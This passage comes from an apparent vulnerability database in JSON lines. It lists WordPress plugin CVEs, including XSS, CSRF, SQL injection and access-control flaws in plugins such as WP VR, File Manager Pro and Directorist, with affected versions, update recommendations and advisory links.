version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/team-members\\\/style1.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/team-members\\\/style1.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/services\\\/content.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/services\\\/content.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6529","slug":"wpvr","versionImpact":"8.3.14","versionEndExcluding":"8.3.15","description":"The WP VR WordPress plugin before 8.3.15 does not have authorisation and CSRF checks in a function hooked to admin_init, allowing unauthenticated users to downgrade the plugin, which leads to Reflected or Stored XSS because previous versions have such vulnerabilities.","recommendation":"Update to version 8.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c36314c1-a2c0-4816-93c9-e61f9cf7f27a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c36314c1-a2c0-4816-93c9-e61f9cf7f27a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8918","slug":"wp-file-manager-pro","versionImpact":"8.3.9","versionEndExcluding":"8.3.10","description":"The File Manager Pro plugin for WordPress is vulnerable to Limited JavaScript File Upload in all versions up to, and including, 8.3.9. This is due to a lack of proper checks on allowed file types. This makes it possible for unauthenticated attackers, with permissions granted by an administrator, to upload .css and .js files, which could lead to Stored Cross-Site Scripting.","recommendation":"Update to version 8.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01ef62c8-e862-422c-948d-6d376d021c82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01ef62c8-e862-422c-948d-6d376d021c82?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8746","slug":"wp-file-manager-pro","versionImpact":"8.3.9","versionEndExcluding":"8.3.10","description":"The File Manager Pro plugin for WordPress is vulnerable to arbitrary backup file downloads and uploads due to missing file type validation via the 'mk_file_folder_manager_shortcode' ajax action in all versions up to, and including, 8.3.9. This makes it possible for unauthenticated attackers, if granted access to the File Manager by an administrator, to download and upload arbitrary backup files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 8.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f1eb9a-f3bb-4b62-975f-a6cb95850966?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f1eb9a-f3bb-4b62-975f-a6cb95850966?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8507","slug":"wp-file-manager-pro","versionImpact":"8.3.9","versionEndExcluding":"8.3.10","description":"The File Manager Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 8.3.9. This is due to missing or incorrect nonce validation on the 'mk_file_folder_manager' ajax action. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 8.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db70b37c-707a-47b8-a3a2-5a2b7d30de89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db70b37c-707a-47b8-a3a2-5a2b7d30de89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"name\":\"https:\\\/\\\/filemanagerpro.io\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0935","slug":"media-library-plus","versionImpact":"8.3.0","versionEndExcluding":"8.3.1","description":"The Media Library Folders plugin for WordPress is vulnerable to unauthorized plugin settings change due to a missing capability check on several AJAX actions in all versions up to, and including, 8.3.0. This makes it possible for authenticated attackers, with Author-level access and above, to change plugin settings related to things such as IP-blocking.","recommendation":"Update to version 8.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L6296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L6296\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L697\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L697\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L7198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php#L7198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234676\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234676\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f810102-cf25-4898-a3a6-3cdc9a96aaea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f810102-cf25-4898-a3a6-3cdc9a96aaea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1414","slug":"wpvr","versionEndExcluding":"8.3.0","description":"The WP VR WordPress plugin before 8.3.0 does not have authorisation and CSRF checks in various AJAX actions, one of which could allow any authenticated user, such as a subscriber, to update arbitrary tours","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d61d4be7-9251-4c62-8fb7-8a456aa6969e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d61d4be7-9251-4c62-8fb7-8a456aa6969e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2224","slug":"directorist","versionImpact":"8.2","versionEndExcluding":"8.3","description":"The Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'parse_query' function in all versions up to, and including, 8.2. This makes it possible for unauthenticated attackers to update the post_status of any post to 'publish'.","recommendation":"Update to version 8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L912\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L912\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L942\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/directorist\\\/trunk\\\/includes\\\/classes\\\/class-add-listing.php#L960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260639\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260639\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/684e6a97-b884-4d25-99f1-81c2a43f1239?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/684e6a97-b884-4d25-99f1-81c2a43f1239?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0566","slug":"smart-manager-for-wp-e-commerce","versionImpact":"8.27.0","versionEndExcluding":"8.28.0","description":"The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","recommendation":"Update to version 8.28.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca83db95-4a08-4615-aa8d-016022404c32\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca83db95-4a08-4615-aa8d-016022404c32\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1413","slug":"wpvr","versionEndExcluding":"8.2.9","description":"The WP VR WordPress plugin before 8.2.9 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6938fee5-3510-45e6-8112-c9e2b30f6881\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6938fee5-3510-45e6-8112-c9e2b30f6881\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0174","slug":"wpvr","versionEndExcluding":"8.2.7","description":"The WP VR WordPress plugin before 8.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b53d0e6-def9-4907-bd2b-884b2afa52b3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6b53d0e6-def9-4907-bd2b-884b2afa52b3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25985","slug":"wordpress-tooltips","versionEndExcluding":"8.2.7","description":"Cross-Site Request Forgery (CSRF) vulnerability in Tomas | Docs | FAQ | Premium Support WordPress Tooltips. This issue affects WordPress Tooltips: from n\/a through 8.2.5.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-tooltips\\\/wordpress-wordpress-tooltips-plugin-8-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-tooltips\\\/wordpress-wordpress-tooltips-plugin-8-2-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12436","slug":"customer-area","versionImpact":"8.2.4","versionEndExcluding":"8.2.5","description":"The WP Customer Area WordPress plugin through 8.2.4 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 8.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3345a403-f62c-40c1-b7ae-bc947591e02a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3345a403-f62c-40c1-b7ae-bc947591e02a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12280","slug":"customer-area","versionImpact":"8.2.4","versionEndExcluding":"8.2.5","description":"The WP Customer Area WordPress plugin through 8.2.4 does not have a CSRF check in place when deleting its logs, which could allow attackers to make a logged in user delete them via a CSRF attack.","recommendation":"Update to version 8.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b32c0b8-28bb-4220-800b-4c369bca91c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b32c0b8-28bb-4220-800b-4c369bca91c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7858","slug":"media-library-plus","versionImpact":"8.2.3","versionEndExcluding":"8.2.4","description":"The Media Library Folders plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several AJAX functions in the media-library-plus.php file in all versions up to, and including, 8.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions related to managing media files and folders, along with controlling settings.","recommendation":"Update to version 8.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc0fc00-b7d6-429c-9ab3-f08971c48777?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcc0fc00-b7d6-429c-9ab3-f08971c48777?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143036%40media-library-plus&new=3143036%40media-library-plus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3143036%40media-library-plus&new=3143036%40media-library-plus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7857","slug":"media-library-plus","versionImpact":"8.2.2","versionEndExcluding":"8.2.3","description":"The Media Library Folders plugin for WordPress is vulnerable to second order SQL Injection via the 'sort_type' parameter of the 'mlf_change_sort_type' AJAX action in all versions up to, and including, 8.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2266254-9281-4859-8630-f7bb5c0ead19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2266254-9281-4859-8630-f7bb5c0ead19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139954\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139954\\\/media-library-plus\\\/trunk\\\/media-library-plus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L1766\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L1766\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L3339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-plus\\\/tags\\\/8.2.2\\\/media-library-plus.php#L3339\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0665","slug":"customer-area","versionImpact":"8.2.2","versionEndExcluding":"8.2.3","description":"The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 8.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025865\\\/customer-area\\\/trunk\\\/src\\\/php\\\/core-addons\\\/admin-area\\\/templates\\\/dashboard-page.template.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025865\\\/customer-area\\\/trunk\\\/src\\\/php\\\/core-addons\\\/admin-area\\\/templates\\\/dashboard-page.template.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6824","slug":"customer-area","versionImpact":"8.2.0","versionEndExcluding":"8.2.1","description":"The WP Customer Area WordPress plugin before 8.2.1 does not properly validate user capabilities in some of its AJAX actions, allowing any user to retrieve other users' account addresses.","recommendation":"Update to version 8.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a224b984-770a-4534-b689-0701b582b388\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a224b984-770a-4534-b689-0701b582b388\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6741","slug":"customer-area","versionImpact":"8.2.0","versionEndExcluding":"8.2.1","description":"The WP Customer Area WordPress plugin before 8.2.1 does not properly validate user capabilities in some of its AJAX actions, allowing malicious users to edit other users' account addresses.","recommendation":"Update to version 8.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9debe1ea-18ad-44c4-8078-68eb66d36c4a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9debe1ea-18ad-44c4-8078-68eb66d36c4a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5464","slug":"jquery-accordion-slideshow","versionImpact":"8.1","versionEndExcluding":"8.2","description":"The Jquery accordion slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0531ca34-5d7b-4071-a1aa-934f14b87728?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0531ca34-5d7b-4071-a1aa-934f14b87728?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985511\\\/jquery-accordion-slideshow#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985511\\\/jquery-accordion-slideshow#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-accordion-slideshow\\\/trunk\\\/jquery-accordion-slideshow.php?rev=2827053#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-accordion-slideshow\\\/trunk\\\/jquery-accordion-slideshow.php?rev=2827053#L177\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1570","slug":"directorist","versionImpact":"8.1","versionEndExcluding":"8.2","description":"The Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 8.1. This is due to the directorist_generate_password_reset_pin_code() and reset_user_password() functions not having enough controls to prevent a successful brute force attack of the OTP to change a password, or verify that a password reset request came from an authorized user. This makes it possible for unauthenticated attackers to generate and brute force an OTP that makes it possible to change any user's password, including an administrator's.","recommendation":"Update to version 8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246340\\\/directorist\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246340\\\/directorist\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853562ed-7f2e-453c-b3d0-67c90bd0231f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/853562ed-7f2e-453c-b3d0-67c90bd0231f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9225","slug":"wp-seopress","versionImpact":"8.1.1","versionEndExcluding":"8.2","description":"The SEOPress \u2013 On-site SEO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 8.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e648f65-3eeb-405d-b243-26354f3843c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e648f65-3eeb-405d-b243-26354f3843c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seopress\\\/tags\\\/8.1.1\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seopress\\\/tags\\\/8.1.1\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php#L286\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159928\\\/wp-seopress\\\/trunk\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3159928\\\/wp-seopress\\\/trunk\\\/inc\\\/admin\\\/wizard\\\/admin-wizard.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50893","slug":"impreza","versionEndExcluding":"8.18","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UpSolution Impreza \u2013 WordPress Website and WooCommerce Builder allows Reflected XSS. This issue affects Impreza \u2013 WordPress Website and WooCommerce Builder: from n\/a through 8.17.4.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/us-core\\\/wordpress-upsolution-core-plugin-8-17-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/us-core\\\/wordpress-upsolution-core-plugin-8-17-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0081","slug":"google-analytics-for-wordpress","versionEndExcluding":"8.12.1","description":"The MonsterInsights WordPress plugin before 8.12.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76d2963c-ebff-498f-9484-3c3008750c14\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76d2963c-ebff-498f-9484-3c3008750c14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8100","slug":"bdthemes-element-pack-lite","versionImpact":"8.1.5","versionEndExcluding":"8.1.6","description":"The Element Pack Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'marker_content' parameter in versions up to, and including, 8.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-open-street-map.js#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-open-street-map.js#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/open-street-map\\\/widgets\\\/open-street-map.php#L498\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/open-street-map\\\/widgets\\\/open-street-map.php#L498\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3339093%40bdthemes-element-pack-lite&new=3339093%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3339093%40bdthemes-element-pack-lite&new=3339093%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f5d3585-19fe-4e85-87d0-7f4c62944146?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f5d3585-19fe-4e85-87d0-7f4c62944146?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4745","slug":"customer-area","versionEndExcluding":"8.1.4","description":"The WP Customer Area WordPress plugin before 8.1.4 does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and, for example, create arbitrary folders or copy files.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9703f42e-bdfe-4787-92c9-47963d9af425\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9703f42e-bdfe-4787-92c9-47963d9af425\",\"refsource\":\"MISC\",\"tags\":[]}]"}
